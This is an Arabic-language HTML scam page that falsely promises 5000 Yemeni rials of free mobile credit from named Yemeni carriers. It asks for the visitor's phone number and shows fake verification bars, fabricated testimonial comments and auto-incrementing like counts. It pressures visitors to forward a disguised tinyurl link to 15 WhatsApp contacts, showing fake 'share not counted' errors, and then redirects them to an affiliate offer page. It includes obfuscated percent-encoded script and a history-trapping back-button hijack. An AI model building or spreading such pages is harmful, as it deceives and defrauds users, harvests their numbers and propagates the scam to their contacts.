<!DOCTYPE html><html><head>

        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>رصيد اليمن مجاناً 2025</title>
        <link rel="shortcut icon" type="image/png" href="images/lhLkOEqF_400x400.jpg">
        <meta name="og:title" content="عيديات مكتبة جرير">
        <meta name="og:url" content="https://jarir.com">
        <meta property="og:description" content="اضغط هنا للحصول على القسيمة">
        <meta property="og:image" content="images/lhLkOEqF_400x400.jpg">
        <meta name="robots" content="noindex">
        <meta name="theme-color" content="#ffffff">
        <link rel="stylesheet" href="css/font-awesome.min.css">
    <link rel="me" href="https://www.blogger.com/profile/01127471097005419735">
<meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
<meta name="google-adsense-platform-domain" content="blogspot.com">
<script defer="" data-domain="od-yemen" src="js/script.js"></script>
<script defer="" data-domain="od-yemen1" src="js/script.js"></script>
<script defer="" data-domain="od-yemen2" src="js/script.js"></script>
<script defer="" data-domain="od-yemen3" src="js/script.js"></script>
<script defer="" data-domain="od-yemen4" src="js/script.js"></script>


</head>
<body>

<style type="text/css">
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("css/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: bold;
    box-sizing: border-box;


}
body {
    direction: rtl;
    background: #ebedf0;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #ff0126;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 200px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 18px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #0f9f52;
    transition: background 0.3s ease;
}
button:hover {
    background: #025ce3;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #006940;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #006940;
}
#fill,
#fill2 {
    background: #0f9f52;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #006940;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
</style>  
  
    <div class="post">

        <div id="intro">
<center><img src="images/9d06Q2i.gif" style="width: 220px;"></center>

          <center><img src="images/NrQtlRs.png" style="width: 330px;"></center>
            <p class="welcome">
              </p><center>
                <span>
دعماً وتقديراً لكم يسعدنا نحن شركات الأتصال اليمنية<br>
 ( يمن موبايل - سبافون - يو - واي  ) <br> 
أن نقدم لكم رصيد مجاني بقيمة <span class="amount">5000 ريـال يمني <br></span>
 لجميع المواطنين ولفترة محدودة
                </span>
                
                <p></p></center>
            <button id="go">اضغط هنا</button>
        </div>
        <div id="loader">
            <div>المرجو الانتظار...</div>
            <div class="spin"></div>
            <div id="num">0%</div>
        </div>
        <div id="info">
            <p class="title">أدخل رقم الهاتف : </p>
            <div class="phone">
                <center><input type="tel" placeholder=" ادخل الرقم هنا " id="name" name="name" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"></center>
                <button id="confirm">إرسال</button>
            </div>
            <p class="error">المرجو ادخال رقم صحيح !</p>
        </div>
        <div id="checking">
            <p class="title">جاري التحقق من الرقم</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
            <center><img src="images/NrQtlRs.png" alt="Win" style="width: 250px;"></center>
             <p class="tip">عميلنا العزيز تهانينا لك !!</p>
            <p class="tip">
                بعد التحقق تبين أنك لم تستفيد من قبل بالرصيد المجاني ، لذلك لقد حصلت على رصيد <span class="amount">5000 ريـال يمني</span>
            </p><br>
            <p class="tip">سوف تتوصل بالرصيد فوراً بعد اتباع الخطوات التالية : </p><br>
            <p class="tip">1 - إضغط على زر "دعوة" الموجود فى الأسفل وارسل الرسالة الى 15 صديقا او 5 مجموعات على الواتساب، ليستطيعو بدورهم الاستفادة من هذا العرض.</p>
            <p class="tip"> سوف يصلك الرصيد المجاني على الرقم : <span class="amount" id="getname"></span> بعد ملئ شريط التحقق الأخضر بالأسفل</p>

            <button id="whatsapp">دعوة</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">يمكنك الحصول على الرصيد</p>
            <button id="offer">اضغط هنا</button>
<center>
<ins style="width: 300px;height:250px" data-width="300" data-height="250" class="e7bb7cbf9d8" data-domain="//data684.click" data-affquery="/5ce4a064be1c10fc71ed/7bb7cbf9d8/?placementName=default"><script src="js/responsive.js" async=""></script></ins>
</center>  
        </div>
        <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://www.facebook.com/reaction/image/1635855486666999/?size=20&scale=1"> <img class="love" src="https://www.facebook.com/reaction/image/1678524932434102/?size=20&scale=1"> <img class="care" src="https://www.facebook.com/reaction/image/613557422527858/?size=20&scale=1"> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    <img src="images/uVKcf6w.jpeg">
                    <div class="single-container">
                        <span class="user">هاشم عبدالله</span>
                      

                        <span class="text">
 شكرا شركة يمن موبايل وصلني الرصيد 5000 الان                         </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="images/mvTZEF5.jpeg">
                    <div class="single-container"><span class="user">منى علي</span> <span class="text">وصلني 5000 ريال يمني  شكرا شركة سبافون </span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="images/wr0rXGW.jpeg">
                    <div class="single-container"><span class="user">مروان عبدالحافظ</span> <span class="text">والله وصدقتو المره دي قلت اكيد كدب بس جربت ووصلني فعلاً الرصيد 5000 ريال من شركة يوو</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="images/FnQcyZX.jpg">
                    <div class="single-container"><span class="user">رشا بنت اليمن</span> <span class="text">❤️ شكرا يمن موبايل وصل الرصيد الأن </span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..."></div>
            </div>
        </div>
    </div>
<script>
<!-- ODcompany -->
document.write(unescape('%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%6C%61%74%65%73%74%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%21%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%70%73%79%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%72%79%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%72%20%28%70%73%79%20%3D%20%30%3B%20%31%30%20%3E%20%70%73%79%3B%20%2B%2B%70%73%79%29%20%68%69%73%74%6F%72%79%2E%70%75%73%68%53%74%61%74%65%28%7B%7D%2C%20%22%22%2C%20%22%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6F%6E%70%6F%70%73%74%61%74%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%70%73%79%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%73%79%2E%73%74%61%74%65%20%26%26%20%61%6C%65%72%74%28%22%4%2%F%20%A%5%20%A%3%C%A%4%3%20%1%A%20%2%7%6%5%9%20%7%4%5%3%A%1%A%F%A%6%20%7%4%5%1%C%8%20%7%3%5%7%4%20%7%4%E%7%8%7%A%C%20%A%8%2%9%20%4%3%20%E%7%8%9%20%8%7%D%F%9%21%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%63%61%74%63%68%20%28%6F%29%20%7B%7D%0A%20%20%20%20%20%20%20%20%7D%29%28%29%3B%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%3C%21%2D%2D%20%4A%53%2D%46%42%20%2D%2D%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%74%69%6D%65%20%3D%20%30%3B%0A%77%69%6E%64%6F%77%2E%73%65%74%49%6E%74%65%72%76%61%6C%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%74%69%6D%65%20%3D%20%74%69%6D%65%20%2B%20%31%3B%0A%20%20%20%20%24%28%22%2E%74%31%22%29%2E%68%74%6D%6C%28%74%69%6D%65%20%2B%20%31%20%2B%20%22%6D%22%29%3B%0A%20%20%20%20%24%28%22%2E%74%32%22%29%2E%68%74%6D%6C%28%74%69%6D%65%20%2B%20%32%20%2B%20%22%6D%22%29%3B%0A%20%20%20%20%24%28%22%2E%74%33%22%29%2E%68%74%6D%6C%28%74%69%6D%65%20%2B%20%34%20%2B%20%22%6D%22%29%3B%0A%7D%2C%20%36%65%34%29%3B%0A%76%61%72%20%6C%69%6B%65%73%20%3D%20%31%33%34%2C%0A%20%20%20%20%63%6F%6D%6D%65%6E%74%73%20%3D%20%32%33%2C%0A%20%20%20%20%73%68%61%72%65%73%20%3D%20%31%32%3B%0A%77%69%6E%64%6F%77%2E%73%65%74%49%6E%74%65%72%76%61%6C%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%6C%69%6B%65%73%20%3D%20%6C%69%6B%65%73%20%2B%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%20%2A%20%33%29%3B%0A%20%20%20%20%63%6F%6D%6D%65%6E%74%73%20%3D%20%63%6F%6D%6D%65%6E%74%73%20%2B%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%20%2A%20%32%29%3B%0A%20%20%20%20%73%68%61%72%65%73%20%3D%20%73%68%61%72%65%73%20%2B%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%20%2A%20%32%29%3B%0A%20%20%20%20%24%28%22%23%6C%69%6B%65%73%22%29%2E%68%74%6D%6C%28%6C%69%6B%65%73%20%2B%20%22%4B%22%29%3B%0A%20%20%20%20%24%28%22%23%63%6F%6D%6D%65%6E%74%73%22%29%2E%68%74%6D%6C%28%63%6F%6D%6D%65%6E%74%73%20%2B%20%22%4B%20%63%6F%6D%6D%65%6E%74%73%22%29%3B%0A%20%20%20%20%24%28%22%23%73%68%61%72%65%73%22%29%2E%68%74%6D%6C%28%73%68%61%72%65%73%20%2B%20%22%4B%20%73%68%61%72%65%73%22%29%3B%0A%7D%2C%20%35%65%33%29%3B%0A%24%28%22%2E%6C%69%6B%65%64%22%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%69%66%20%28%24%28%74%68%69%73%29%2E%68%61%73%43%6C%61%73%73%28%22%73%65%6C%65%63%74%65%64%22%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%74%68%69%73%29%2E%72%65%6D%6F%76%65%43%6C%61%73%73%28%22%73%65%6C%65%63%74%65%64%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%74%68%69%73%29%2E%68%74%6D%6C%28%22%4C%69%6B%65%22%29%3B%0A%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%24%28%74%68%69%73%29%2E%61%64%64%43%6C%61%73%73%28%22%73%65%6C%65%63%74%65%64%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%74%68%69%73%29%2E%68%74%6D%6C%28%22%55%6E%6C%69%6B%65%22%29%3B%0A%20%20%20%20%7D%0A%7D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%21%2D%2D%20%4A%53%2D%46%42%20%2D%2D%3E%20%20%20%20%0A%3C%21%2D%2D%20%4A%53%2D%4D%41%49%4E%20%2D%2D%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%0A%24%28%22%23%67%6F%22%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%24%28%22%23%69%6E%74%72%6F%22%29%2E%66%61%64%65%4F%75%74%28%30%29%3B%0A%20%20%20%20%24%28%22%23%6C%6F%61%64%65%72%22%29%2E%66%61%64%65%49%6E%28%31%30%30%30%29%3B%0A%20%20%20%20%76%61%72%20%69%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%6E%74%65%72%76%61%6C%20%3D%20%73%65%74%49%6E%74%65%72%76%61%6C%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6E%75%6D%22%29%2E%74%65%78%74%28%69%20%2B%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%69%20%2B%3D%20%31%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%20%3E%3D%20%31%30%30%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%6C%6F%61%64%65%72%22%29%2E%66%61%64%65%4F%75%74%28%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%69%6E%66%6F%22%29%2E%66%61%64%65%49%6E%28%31%30%30%30%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%2C%20%35%30%29%3B%0A%7D%29%3B%0A%24%28%22%23%63%6F%6E%66%69%72%6D%22%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%69%66%20%28%24%28%22%23%6E%61%6D%65%22%29%2E%76%61%6C%28%29%2E%6C%65%6E%67%74%68%20%3C%20%34%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%2E%65%72%72%6F%72%22%29%2E%66%61%64%65%49%6E%28%35%30%30%29%3B%0A%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23%69%6E%66%6F%22%29%2E%66%61%64%65%4F%75%74%28%30%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%63%68%65%63%6B%69%6E%67%22%29%2E%66%61%64%65%49%6E%28%31%30%30%30%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%69%20%3D%20%30%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%69%6E%74%65%72%76%61%6C%20%3D%20%73%65%74%49%6E%74%65%72%76%61%6C%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%20%2B%3D%20%31%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%70%65%72%63%65%6E%74%61%67%65%22%29%2E%74%65%78%74%28%69%20%2B%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%66%69%6C%6C%22%29%2E%63%73%73%28%22%77%69%64%74%68%22%2C%20%69%20%2B%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%69%20%3D%3D%20%35%30%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%20%3D%20%34%39%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%20%3D%20%35%30%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%31%30%30%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%69%20%3E%3D%20%31%30%30%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%6C%6F%61%64%22%29%2E%66%61%64%65%4F%75%74%28%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%63%68%65%63%6B%22%29%2E%66%61%64%65%49%6E%28%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%63%68%65%63%6B%69%6E%67%22%29%2E%66%61%64%65%4F%75%74%28%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%73%68%61%72%65%22%29%2E%66%61%64%65%49%6E%28%31%30%30%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%67%65%74%6E%61%6D%65%22%29%2E%68%74%6D%6C%28%24%28%22%23%6E%61%6D%65%22%29%2E%76%61%6C%28%29%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%31%30%30%30%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%2C%20%35%30%29%3B%0A%20%20%20%20%7D%0A%7D%29%3B%0A%24%28%64%6F%63%75%6D%65%6E%74%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%69%66%20%28%24%28%22%23%6E%61%6D%65%22%29%2E%69%73%28%22%3A%66%6F%63%75%73%22%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%2E%65%72%72%6F%72%22%29%2E%66%61%64%65%4F%75%74%28%35%30%30%29%3B%0A%20%20%20%20%7D%0A%7D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%21%2D%2D%20%4A%53%2D%4D%41%49%4E%20%2D%2D%3E'))
</script>    <script src="js/jquery-latest.min.js"></script>
    <script type="text/javascript">
        !(function () {
            var psy;
            try {
                for (psy = 0; 10 > psy; ++psy) history.pushState({}, "", "");
                onpopstate = function (psy) {
                    psy.state && alert("%4%2%F %A%5 %A%3%C%A%4%3 %1%A %2%7%6%5%9 %7%4%5%3%A%1%A%F%A%6 %7%4%5%1%C%8 %7%3%5%7%4 %7%4%E%7%8%7%A%C %A%8%2%9 %4%3 %E%7%8%9 %8%7%D%F%9!");
                };
            } catch (o) {}
        })();
    </script>
<!-- JS-FB -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>
<!-- JS-FB -->    
<!-- JS-MAIN -->
<script type="text/javascript">

$("#go").click(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#info").fadeIn(1000);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 4) {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 1000);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>
<!-- JS-MAIN -->

  
    <script>
        var text1 = "",
            text2 = "%0A",
            link = "لليمنيين 🇾🇪 بسرعة يا جماعة جميع شركات الاتصال تقدم رصيد مجاني بقيمة 5000 ريـال يمني اقسم بالله انا حصلت على الرصيد الآن سارع من هنا : https://tinyurl.com/YemenMobiIe-49",
            error = "هناك خطأ!\nالمشاركات غير محسوبة ربما شاركته مع نفس الصديق او المجموعة اكثر من مرة، من فضلك اعد المشاركة.",
            cpa = "https://yemnof.pages.dev/",
            saved = "MAMA7lwa",
            share = "whatsapp://send?text=" + link;
    </script>


<script>
<!-- code by ODcompany -->
  <!-- JS -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});  
  
</script>
<script type="text/javascript">  
var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $(".welcome").fadeOut(0);
    $(".step1").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 2;
    } else if (width == 82) {
        width += 2;
    } else if (width == 84) {
        width += 2;
    } else if (width == 86) {
        width += 2;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 3;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 1;
    } else if (width == 97) {
        width += 1;
    } else if (width == 98) {
        width += 1;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);  
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});  
</script>  
<!-- JS-WP --> 

 

  <!-- Global site tag (gtagش.js) - Google Analytics -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-152330835-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-152330835-1');
</script>

</body></html>